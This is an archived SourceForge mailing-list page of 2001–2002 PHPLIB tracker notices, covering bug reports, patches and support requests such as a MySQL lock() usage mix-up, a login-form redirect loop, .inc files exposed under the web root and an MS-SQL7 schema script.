phplib-trackers Mailing List for PHPLIB (Page 16)
Brought to you by:
nhruby,
richardarcher
Menu
▾
▴
phplib-trackers — List for monitoring the phplib SourceForge trackers.
You can subscribe to this list here.
| 2001 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
(91) |
Sep
(12) |
Oct
(26) |
Nov
(16) |
Dec
(14) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2002 |
Jan
(37) |
Feb
(22) |
Mar
(39) |
Apr
(74) |
May
(14) |
Jun
(17) |
Jul
(81) |
Aug
(32) |
Sep
(28) |
Oct
(18) |
Nov
(8) |
Dec
(6) |
| 2003 |
Jan
(6) |
Feb
(11) |
Mar
(5) |
Apr
(4) |
May
(6) |
Jun
(6) |
Jul
(5) |
Aug
(3) |
Sep
(8) |
Oct
(4) |
Nov
(2) |
Dec
(2) |
| 2004 |
Jan
(1) |
Feb
|
Mar
(3) |
Apr
(8) |
May
(1) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
(3) |
Nov
|
Dec
(2) |
| 2005 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
(1) |
| 2006 |
Jan
|
Feb
(2) |
Mar
(6) |
Apr
|
May
|
Jun
|
Jul
|
Aug
(1) |
Sep
(2) |
Oct
(2) |
Nov
|
Dec
|
| 2007 |
Jan
|
Feb
(2) |
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(1) |
Oct
(1) |
Nov
|
Dec
|
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(1) |
Oct
|
Nov
|
Dec
|
| 2009 |
Jan
(1) |
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2010 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
(41) |
Nov
|
Dec
(78) |
|
From: <no...@so...> - 2002-04-09 16:19:40
|
Bugs item #541551, was opened at 2002-04-09 09:02 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=541551&group_id=31885 Category: None Group: None >Status: Closed >Resolution: Invalid Priority: 5 Submitted By: NickM (terado) Assigned to: Nobody/Anonymous (nobody) Summary: db_mysql lock tables Initial Comment: When issuing a lock command with an array of values, e.g.: $db->lock(array("table1"=>"read", "table2"=>"read")); this is resolved wrongly in the lock function, and instead attempts: lock tables read table1, read table2 now if the array is created the other way the obviously "read" would be the index and be overwritten!! Resolve: $key/$value other way around:- while (list($key,$value) = each($table)) { if (!is_int($key)) { // lock modes are "read", "read local", "write", "low priority write" $query .= "$key $value, "; } else { $query .= "$key $mode, "; } } ---------------------------------------------------------------------- >Comment By: Layne Weathers (layne_weathers) Date: 2002-04-09 11:19 Message: Logged In: YES user_id=278685 > When issuing a lock command with an array of values, > e.g.: > $db->lock(array("table1"=>"read", "table2"=>"read")); > > this is resolved wrongly in the lock function, and > instead attempts: > > lock tables read table1, read table2 That has never been the correct way to call lock(), even before the recent changes to lock(). The online documentation at <http://www.sanisoft.com/phplib/manual/DB_SqlMethods.php> was vague, so I added some examples. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=541551&group_id=31885 |
|
From: <no...@so...> - 2002-04-09 14:03:44
|
Bugs item #541551, was opened at 2002-04-09 14:02 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=541551&group_id=31885 Category: None Group: None Status: Open Resolution: None Priority: 5 Submitted By: NickM (terado) Assigned to: Nobody/Anonymous (nobody) >Summary: db_mysql lock tables Initial Comment: When issuing a lock command with an array of values, e.g.: $db->lock(array("table1"=>"read", "table2"=>"read")); this is resolved wrongly in the lock function, and instead attempts: lock tables read table1, read table2 now if the array is created the other way the obviously "read" would be the index and be overwritten!! Resolve: $key/$value other way around:- while (list($key,$value) = each($table)) { if (!is_int($key)) { // lock modes are "read", "read local", "write", "low priority write" $query .= "$key $value, "; } else { $query .= "$key $mode, "; } } ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=541551&group_id=31885 |
|
From: <no...@so...> - 2002-04-09 14:02:28
|
Bugs item #541551, was opened at 2002-04-09 14:02 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=541551&group_id=31885 Category: None Group: None Status: Open Resolution: None Priority: 5 Submitted By: NickM (terado) Assigned to: Nobody/Anonymous (nobody) Summary: gb_mysql lock tables Initial Comment: When issuing a lock command with an array of values, e.g.: $db->lock(array("table1"=>"read", "table2"=>"read")); this is resolved wrongly in the lock function, and instead attempts: lock tables read table1, read table2 now if the array is created the other way the obviously "read" would be the index and be overwritten!! Resolve: $key/$value other way around:- while (list($key,$value) = each($table)) { if (!is_int($key)) { // lock modes are "read", "read local", "write", "low priority write" $query .= "$key $value, "; } else { $query .= "$key $mode, "; } } ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=541551&group_id=31885 |
|
From: <no...@so...> - 2002-04-09 08:44:21
|
Patches item #518198, was opened at 2002-02-15 14:39 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403613&aid=518198&group_id=31885 Category: Widget (example) Group: None Status: Open Resolution: None Priority: 5 Submitted By: Erik Norvelle (enorvelle) Assigned to: Nobody/Anonymous (nobody) Summary: oc_time control submitted for oohforms Initial Comment: The attached file is an instantiation of a time input control, derived from oc_calendar by Sanisoft. ---------------------------------------------------------------------- Comment By: Nobody/Anonymous (nobody) Date: 2002-04-09 01:44 Message: Logged In: NO The "extrahtml"-function is not provided in the actual version of of_time.inc. Replace the following function and it works: ----------------- function self_get($val, $which, &$count) { $str = ""; $count = 2; $val=trim($val); if(!empty($val)) { $this->value = $val; $val_arr = explode (":",$val); $this->hour = (int) $val_arr[0]; $this->min = (int) $val_arr[1]; } // Generate hour selector $str = "<select name='" . $this- >name . "_hour'"; if ($this->extrahtml) $str .= " $this->extrahtml"; $str.=">"; for ($hour = 0; $hour <= 23; $hour++) { if ($hour < 10) { $prefix = "0"; } else { $prefix = ""; } $str .= "<option value='$prefix$hour'"; if ($hour == $this->hour) { $str .= " selected"; } $str .= ">$prefix$hour"; } $str .= "</select><b>:</b>"; // Generate minute selector $str .= "<select name='" . $this- >name . "_min'"; if ($this->extrahtml) $str .= " $this->extrahtml"; $str.=">"; for ($min = 0; $min < 60; $min++) { if ($min < 10) { $prefix = "0"; } else { $prefix = ""; } $str .= "<option value='$prefix$min'"; if ($min == $this->min) { $str .= " selected"; } $str .= ">$prefix$min"; } $str .= "</select>"; //$str .= "<br>$val " . $this->hour . " " . $this->min; return $str; } ---------------------------------------------------------------------- Comment By: Dr Tarique Sani (tarique) Date: 2002-02-15 20:07 Message: Logged In: YES user_id=269695 Cool!! and thanks will put it in the next release?!! of of_cal BUT of_cal is not a part of PHPlib as yet :-) ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403613&aid=518198&group_id=31885 |
|
From: <no...@so...> - 2002-04-08 12:09:16
|
Bugs item #540956, was opened at 2002-04-08 05:09 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=540956&group_id=31885 Category: None Group: None Status: Open Resolution: None Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Nobody/Anonymous (nobody) Summary: default login problem solved (login_if) Initial Comment: Hi, i solved a login_if problem. I wonder if someone else experienced this issue!?. PHPlib 7.2 under Linux 2.4.10 (SuSE 7.3) with Konqueror. By using the default login feature (var $nobody = true;)i discovered a problem while login in as a specific user (via url?again=yes): The login form claimed 'Either your username ... are invalid' even if i definitly put in the correct username/password. I found a vulnerability (bug?) in the *loginform.ihtml files: They use <form name="login" action="<?php print $this->url() ?>" method=post> to redirect to the page you come from. Unfortunately this gives the 'again=yes' back and results in a 'login-loop'. Hint: Replace the PHP line above with: <form name="login" action="<?php $full_url = $this->url(); $url = substr($full_url,0,strpos($full_url,"?")); print $url; ?>" method=post> This should fix the problem. Sascha ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=540956&group_id=31885 |
|
From: <no...@so...> - 2002-04-02 22:42:05
|
Patches item #497830, was opened at 2001-12-30 04:33 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403613&aid=497830&group_id=31885 Category: None Group: None Status: Deleted Resolution: Rejected Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Nobody/Anonymous (nobody) Summary: Added IF/ELSE/ENDIF to template.inc Initial Comment: Fixed backslash corruption in template.inc. (See prior patch #480713). Added support for sub-blocks in template to be conditionals via embedded IF/ELSE/ENDIF comments. ---------------------------------------------------------------------- >Comment By: Layne Weathers (layne_weathers) Date: 2002-04-02 16:42 Message: Logged In: YES user_id=278685 As discussed in the phplib-users list ad nauseum, logic belongs in PHP, not HTML. ---------------------------------------------------------------------- Comment By: Layne Weathers (layne_weathers) Date: 2002-04-02 16:35 Message: Logged In: YES user_id=278685 As discussed in the phplib-users list ad nauseum, logic belongs in PHP, not HTML. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403613&aid=497830&group_id=31885 |
|
From: <no...@so...> - 2002-04-02 22:35:13
|
Patches item #497830, was opened at 2001-12-30 04:33 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403613&aid=497830&group_id=31885 Category: None Group: None >Status: Deleted >Resolution: Rejected Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Nobody/Anonymous (nobody) Summary: Added IF/ELSE/ENDIF to template.inc Initial Comment: Fixed backslash corruption in template.inc. (See prior patch #480713). Added support for sub-blocks in template to be conditionals via embedded IF/ELSE/ENDIF comments. ---------------------------------------------------------------------- >Comment By: Layne Weathers (layne_weathers) Date: 2002-04-02 16:35 Message: Logged In: YES user_id=278685 As discussed in the phplib-users list ad nauseum, logic belongs in PHP, not HTML. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403613&aid=497830&group_id=31885 |
|
From: <no...@so...> - 2002-03-31 11:50:18
|
Support Requests item #537375, was opened at 2002-03-31 03:50 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403612&aid=537375&group_id=31885 Category: None Group: None Status: Open Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Nobody/Anonymous (nobody) Summary: web portal Initial Comment: I have a task in my firm creating a websites Portal. there are a lots of pages in my firm that i will like to summarise and have them presented in my pages, i.e showing different pages on a single window. can u please help me how to go about it. david kuku ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403612&aid=537375&group_id=31885 |
|
From: <no...@so...> - 2002-03-28 12:03:40
|
Bugs item #536093, was opened at 2002-03-27 21:03 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=536093&group_id=31885 Category: None Group: None Status: Closed Resolution: Rejected Priority: 5 Submitted By: Prachait Saxena (prachait) Assigned to: Richard Archer (richardarcher) Summary: imp content of .inc files shown Initial Comment: Hello Freinds !!! Please change the extension of .inc to .inc.php3 as when we call .inc files explicitly it shows our important content. Password in case of local.inc or config.inc I hope you will consider this problem !!! Bye & Have a nice day. Prachait Saxena --------------------------- Phone :- +91 - 712 - 544476 Email :- pra...@na... (Official) pra...@ya... (Official) get...@ya... (Personal) ICQ :- 71855637 MSN :- prachait Yahoo Messenger :- getprachait If you do for other's ! Other's will do for you !! Visit me at http://www.sitesontesting.com/prachait ---------------------------------------------------------------------- Comment By: Nobody/Anonymous (nobody) Date: 2002-03-28 03:52 Message: Logged In: NO Prachait you appear to be a real ass hole who does not read the documents ---------------------------------------------------------------------- Comment By: Richard Archer (richardarcher) Date: 2002-03-27 21:36 Message: Logged In: YES user_id=279311 Aargh! I can't believe this! NEVER NEVER NEVER place your .inc files inside your html document tree!!! Create a directory structure like: /home/me/public_html/<all your web stuff> /home/me/php_libs/<all your include files> Don't blame anyone but yourself for security problems caused by your complete failure to read the documentation! ...R. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=536093&group_id=31885 |
|
From: <no...@so...> - 2002-03-28 05:36:46
|
Bugs item #536093, was opened at 2002-03-28 16:03 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=536093&group_id=31885 Category: None Group: None >Status: Closed >Resolution: Rejected Priority: 5 Submitted By: Prachait Saxena (prachait) >Assigned to: Richard Archer (richardarcher) Summary: imp content of .inc files shown Initial Comment: Hello Freinds !!! Please change the extension of .inc to .inc.php3 as when we call .inc files explicitly it shows our important content. Password in case of local.inc or config.inc I hope you will consider this problem !!! Bye & Have a nice day. Prachait Saxena --------------------------- Phone :- +91 - 712 - 544476 Email :- pra...@na... (Official) pra...@ya... (Official) get...@ya... (Personal) ICQ :- 71855637 MSN :- prachait Yahoo Messenger :- getprachait If you do for other's ! Other's will do for you !! Visit me at http://www.sitesontesting.com/prachait ---------------------------------------------------------------------- >Comment By: Richard Archer (richardarcher) Date: 2002-03-28 16:36 Message: Logged In: YES user_id=279311 Aargh! I can't believe this! NEVER NEVER NEVER place your .inc files inside your html document tree!!! Create a directory structure like: /home/me/public_html/<all your web stuff> /home/me/php_libs/<all your include files> Don't blame anyone but yourself for security problems caused by your complete failure to read the documentation! ...R. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=536093&group_id=31885 |
|
From: <no...@so...> - 2002-03-28 05:03:52
|
Bugs item #536093, was opened at 2002-03-28 05:03 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=536093&group_id=31885 Category: None Group: None Status: Open Resolution: None Priority: 5 Submitted By: Prachait Saxena (prachait) Assigned to: Nobody/Anonymous (nobody) Summary: imp content of .inc files shown Initial Comment: Hello Freinds !!! Please change the extension of .inc to .inc.php3 as when we call .inc files explicitly it shows our important content. Password in case of local.inc or config.inc I hope you will consider this problem !!! Bye & Have a nice day. Prachait Saxena --------------------------- Phone :- +91 - 712 - 544476 Email :- pra...@na... (Official) pra...@ya... (Official) get...@ya... (Personal) ICQ :- 71855637 MSN :- prachait Yahoo Messenger :- getprachait If you do for other's ! Other's will do for you !! Visit me at http://www.sitesontesting.com/prachait ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=536093&group_id=31885 |
|
From: <no...@so...> - 2002-03-21 02:02:46
|
Bugs item #532869, was opened at 2002-03-20 18:02 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=532869&group_id=31885 Category: None Group: None Status: Open Resolution: None Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Nobody/Anonymous (nobody) Summary: Demo privileges broken Initial Comment: The privilege settings in the demonstration on your website seem broken: - when the non-admin user looks at the userlevel, they frequently see "Array" rather than anything useful. - when the admin user looks at it, the select-box contains nothing selected, and usually submitting it (even after selecting one) shows an error. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=532869&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 19:17:54
|
Bugs item #482372, was opened at 2001-11-15 22:05 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=482372&group_id=31885 Category: None Group: None Status: Closed >Resolution: Invalid Priority: 5 Submitted By: Russell McOrmond (russellmcormond) Assigned to: Layne Weathers (layne_weathers) Summary: problem in page.inc Initial Comment: phplib-7.2d , 7.2c (I upgraded to see if the upgrade would fix the problem) I just upgraded from PHP 4.0.4 to php 4.0.6 On my PHPSlash site I would get the following on the bottom of each page: Fatal error: Call to a member function on a non-object in /usr/share/phplib/page.inc on line 68 I am temporarily using the following patch which masks the problem, but I suspect something else is not properly happening at this point. --- page.inc Wed Jul 12 14:22:35 2000 +++ /usr/share/phplib/page.inc Thu Nov 15 22:54:52 2001 @@ -64,7 +64,7 @@ if (isset($sess)) { $sess->freeze(); - if (isset($user)) { + if (isset($user) && isset($user->freeze)) { $user->freeze(); } } ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=482372&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 19:17:29
|
Bugs item #496163, was opened at 2001-12-22 14:59 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=496163&group_id=31885 Category: None Group: None Status: Closed >Resolution: Invalid Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Richard Archer (richardarcher) Summary: on creating new user permissions Initial Comment: When a new user is created with pages/admin/new_user_md5.php3, the value 'Array' is written to database instead of the selected permissions. The problem is, that multiple permissions can be selected in the form, but when the HTTP_POST_VARIABLES are processed the varible $perms that is passed by CGI is treated as a normal variable. But it is an array! that holds multiple permissions. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=496163&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 19:16:47
|
Bugs item #474476, was opened at 2001-10-24 09:18 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=474476&group_id=31885 Category: None Group: None Status: Closed >Resolution: Fixed Priority: 5 Submitted By: Jaros³aw Zabie³³o (zbiru) Assigned to: Layne Weathers (layne_weathers) Summary: stuff/create_database.mssql7 attached Initial Comment: /* Author: Jaros³aw Zabie³³o, web...@wa..., 2001-10-24 Gererated from server MS-SQL7 SP3 by Enterprise Manager */ /****** Object: Table [dbo].[active_sessions] Script Date: 2001-10-23 23:14:28 ******/ if exists (select * from sysobjects where id = object_id(N'[dbo].[active_sessions]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [dbo].[active_sessions] GO /****** Object: Table [dbo]. [active_sessions_split] Script Date: 2001-10-23 23:14:28 ******/ if exists (select * from sysobjects where id = object_id(N'[dbo].[active_sessions_split]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [dbo].[active_sessions_split] GO /****** Object: Table [dbo].[auth_user] Script Date: 2001-10-23 23:14:28 ******/ if exists (select * from sysobjects where id = object_id(N'[dbo].[auth_user]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [dbo].[auth_user] GO /****** Object: Table [dbo].[auth_user_md5] Script Date: 2001-10-23 23:14:28 ******/ if exists (select * from sysobjects where id = object_id(N'[dbo].[auth_user_md5]') and OBJECTPROPERTY (id, N'IsUserTable') = 1) drop table [dbo].[auth_user_md5] GO /****** Object: Table [dbo].[db_sequence] Script Date: 2001-10-23 23:14:28 ******/ if exists (select * from sysobjects where id = object_id(N'[dbo].[db_sequence]') and OBJECTPROPERTY (id, N'IsUserTable') = 1) drop table [dbo].[db_sequence] GO /****** Object: User dbo Script Date: 2001-10-23 23:14:28 ******/ /****** Object: Table [dbo].[active_sessions] Script Date: 2001-10-23 23:14:29 ******/ CREATE TABLE [dbo].[active_sessions] ( [sid] [varchar] (32) NOT NULL , [name] [varchar] (32) NOT NULL , [val] [text] NULL , [changed] [varchar] (14) NOT NULL ) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY] GO /****** Object: Table [dbo]. [active_sessions_split] Script Date: 2001-10-23 23:14:29 ******/ CREATE TABLE [dbo].[active_sessions_split] ( [ct_sid] [varchar] (32) NOT NULL , [ct_name] [varchar] (32) NOT NULL , [ct_pos] [varchar] (6) NOT NULL , [ct_val] [text] NULL , [ct_changed] [varchar] (14) NOT NULL ) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY] GO /****** Object: Table [dbo].[auth_user] Script Date: 2001-10-23 23:14:30 ******/ CREATE TABLE [dbo].[auth_user] ( [user_id] [varchar] (32) NOT NULL , [username] [varchar] (32) NOT NULL , [password] [varchar] (32) NOT NULL , [perms] [varchar] (255) NULL ) ON [PRIMARY] GO /****** Object: Table [dbo].[auth_user_md5] Script Date: 2001-10-23 23:14:30 ******/ CREATE TABLE [dbo].[auth_user_md5] ( [user_id] [varchar] (32) NOT NULL , [username] [varchar] (32) NOT NULL , [password] [varchar] (32) NOT NULL , [perms] [varchar] (255) NULL ) ON [PRIMARY] GO /****** Object: Table [dbo].[db_sequence] Script Date: 2001-10-23 23:14:30 ******/ CREATE TABLE [dbo].[db_sequence] ( [seq_name] [varchar] (127) NOT NULL , [nextid] [int] NOT NULL ) ON [PRIMARY] GO ALTER TABLE [dbo].[active_sessions] WITH NOCHECK ADD CONSTRAINT [DF_active_sessions_changed] DEFAULT ('') FOR [changed], CONSTRAINT [PK_active_sessions] PRIMARY KEY NONCLUSTERED ( [name], [sid] ) ON [PRIMARY] GO ALTER TABLE [dbo].[active_sessions_split] WITH NOCHECK ADD CONSTRAINT [DF_active_sessions_split_ct_sid] DEFAULT ('') FOR [ct_sid], CONSTRAINT [DF_active_sessions_split_ct_name] DEFAULT ('') FOR [ct_name], CONSTRAINT [DF_active_sessions_split_ct_pos] DEFAULT ('') FOR [ct_pos], CONSTRAINT [DF_active_sessions_split_ct_changed] DEFAULT ('') FOR [ct_changed], CONSTRAINT [PK_active_sessions_split] PRIMARY KEY NONCLUSTERED ( [ct_name], [ct_sid], [ct_pos] ) ON [PRIMARY] GO ALTER TABLE [dbo].[auth_user] WITH NOCHECK ADD CONSTRAINT [DF_auth_user_user_id] DEFAULT ('') FOR [user_id], CONSTRAINT [DF_auth_user_username] DEFAULT ('') FOR [username], CONSTRAINT [DF_auth_user_password] DEFAULT ('') FOR [password], CONSTRAINT [PK_auth_user] PRIMARY KEY NONCLUSTERED ( [user_id] ) ON [PRIMARY] GO ALTER TABLE [dbo].[auth_user_md5] WITH NOCHECK ADD CONSTRAINT [DF_auth_user_md5_user_id] DEFAULT ('') FOR [user_id], CONSTRAINT [DF_auth_user_md5_username] DEFAULT ('') FOR [username], CONSTRAINT [DF_auth_user_md5_password] DEFAULT ('') FOR [password], CONSTRAINT [PK_auth_user_md5] PRIMARY KEY NONCLUSTERED ( [user_id] ) ON [PRIMARY] GO ALTER TABLE [dbo].[db_sequence] WITH NOCHECK ADD CONSTRAINT [DF_db_sequence_seq_name] DEFAULT ('') FOR [seq_name], CONSTRAINT [DF_db_sequence_nextid] DEFAULT (0) FOR [nextid], CONSTRAINT [PK_db_sequence] PRIMARY KEY NONCLUSTERED ( [seq_name] ) ON [PRIMARY] GO CREATE INDEX [IX_active_sessions] ON [dbo]. [active_sessions]([changed]) ON [PRIMARY] GO CREATE INDEX [IX_active_sessions_split] ON [dbo]. [active_sessions_split]([ct_changed]) ON [PRIMARY] GO CREATE UNIQUE INDEX [IX_auth_user] ON [dbo]. [auth_user]([username]) ON [PRIMARY] GO CREATE UNIQUE INDEX [IX_auth_user_md5] ON [dbo]. [auth_user_md5]([username]) ON [PRIMARY] GO GRANT SELECT , UPDATE , INSERT , DELETE ON [dbo]. [active_sessions] TO [public] GO GRANT SELECT , UPDATE , INSERT , DELETE ON [dbo]. [active_sessions_split] TO [public] GO GRANT SELECT , UPDATE , INSERT , DELETE ON [dbo]. [auth_user] TO [public] GO GRANT SELECT , UPDATE , INSERT , DELETE ON [dbo]. [auth_user_md5] TO [public] GO GRANT SELECT , UPDATE , INSERT , DELETE ON [dbo]. [db_sequence] TO [public] GO INSERT INTO dbo.auth_user VALUES ('c14cbf141ab1b7cd009356f555b607dc','kris','test','admi n'); INSERT INTO dbo.auth_user_md5 VALUES ('c14cbf141ab1b7cd009356f555b607dc','kris','098f6bcd462 1d373cade4e832627b4f6','admin'); ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=474476&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 19:16:46
|
Bugs item #474472, was opened at 2001-10-24 09:12 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=474472&group_id=31885 Category: None Group: None Status: Closed Resolution: Fixed Priority: 5 Submitted By: Jaros³aw Zabie³³o (zbiru) Assigned to: Layne Weathers (layne_weathers) Summary: db_mssql.inc metadata() contains bugs Initial Comment: There is a bug in function metadata() in file db_mssql.inc (phplib 7.2d). In the line $info = mssql_fetch_field($id, $i); the $info variable is not array. It is object. So you should change code from: $res[$i]["name"] = $info["name"]; $res[$i]["len"] = $info["max_length"]; $res[$i]["flags"] = $info["numeric"]; to: $res[$i]["name"] = $info->{name}; $res[$i]["len"] = $info->{max_length}; $res[$i]["flags"] = $info->{numeric}; ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=474472&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 19:16:46
|
Bugs item #474475, was opened at 2001-10-24 09:17 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=474475&group_id=31885 Category: None Group: None Status: Closed Resolution: Fixed Priority: 5 Submitted By: Jaros³aw Zabie³³o (zbiru) Assigned to: Layne Weathers (layne_weathers) Summary: stuff/create_database.mssql7 Initial Comment: I prepared the correct SQL code for MS-SQL7. It should be launched with eg. Query Analizer. It contains definitions of some tables which should be created if you want to use phplib width MS-SQL7. ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=474475&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 19:16:33
|
Bugs item #446455, was opened at 2001-07-31 11:15 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=446455&group_id=31885 Category: None Group: None Status: Closed Resolution: Fixed Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Layne Weathers (layne_weathers) Summary: Failures with register_globals off Initial Comment: PHPLib should work when register_globals is off. Below is a work around, I added this to prepend.php3 // If we set "phpflags register_globals off" in .htaccess then the variable name // space can not be spammed by rogue clients. As a side effect certain PHPLib // scripts fail. Poor engineering on thier part. Below are the variables that // are need, that I have tracked down so far. These can be retrieved via the // HTTP_SERVER_VARS array. I may have missed some. HTTPS is suspect because I // don't have a secure server to test against. Here I make my own versions // globaly available from the HTTP_SERVER_VARS array $HTTPS = $HTTP_SERVER_VARS["HTTPS"]; $HTTP_HOST = $HTTP_SERVER_VARS["HTTP_HOST"]; $HTTP_REFERER = $HTTP_SERVER_VARS["HTTP_REFERER"]; $HTTP_USER_AGENT = $HTTP_SERVER_VARS ["HTTP_USER_AGENT"]; $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"]; $QUERY_STRING = $HTTP_SERVER_VARS["QUERY_STRING"]; $REMOTE_ADDR = $HTTP_SERVER_VARS["REMOTE_ADDR"]; ---------------------------------------------------------------------- Comment By: Gaetano Giunta (ggiunta) Date: 2002-01-10 04:43 Message: Logged In: YES user_id=114789 why not use getenv() instead of HTTP_*_VARS ? It should work even better, independently of php.ini settings (namely variables_order, that can be set to GPC only) ---------------------------------------------------------------------- Comment By: Bob Gorman (rag56) Date: 2001-08-27 09:33 Message: Logged In: YES user_id=285806 richardarcher said: > This is a very effective short term fix, but wouldn't > it be better in the long term to change all the > references to these variables to use the > HTTP_(SERVER|GET|POST)_VARS arrays? Yes! Can we get this added into the queue for future enhancements? As an example of good coding; session.inc does a nice job working with HTTP_*_VARS. That script gets variables from the HTTP_*_VARS arrays and ALSO checks them with an isset() function call. That is reduces un-needed output when E_NOTICE is set for error reporting. ---------------------------------------------------------------------- Comment By: Richard Archer (richardarcher) Date: 2001-08-12 04:30 Message: Logged In: YES user_id=279311 This is a very effective short term fix, but wouldn't it be better in the long term to change all the references to these variables to use the HTTP_(SERVER|GET|POST)_VARS arrays? If the user prefers to have register_globals off it's a little rude of us to define all these globals :) It certainly runs into the problem of overlapping name-space. ---------------------------------------------------------------------- Comment By: Bob Gorman (rag56) Date: 2001-08-02 09:23 Message: Logged In: YES user_id=285806 I will code up fixes for this issue and submit them if you want me to. JLMK. ---------------------------------------------------------------------- Comment By: Bob Gorman (rag56) Date: 2001-08-02 09:21 Message: Logged In: YES user_id=285806 This also has ramifactions in local.inc. In Example_Auth the function auth_validatelogin() needs to declare and extract $username and $password from $HTTP_POST_VARS. For example: function auth_validatelogin() { global $username, $password; global $HTTP_POST_VARS; $username = $HTTP_POST_VARS["username"]; $password = $HTTP_POST_VARS["password"]; ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=446455&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 19:16:29
|
Bugs item #473198, was opened at 2001-10-20 12:27 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=473198&group_id=31885 Category: None Group: None Status: Closed Resolution: Fixed Priority: 5 Submitted By: Andreas Stein (steinas) Assigned to: Layne Weathers (layne_weathers) Summary: oohforms falg_ instead of flag_ Initial Comment: file: oohforms.inc method: get_element() line: 278 should be flag_name... instead of falg_ ---------------------------------------------------------------------- You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=473198&group_id=31885 |
|
From: <no...@so...> - 2002-03-20 10:49:08
|
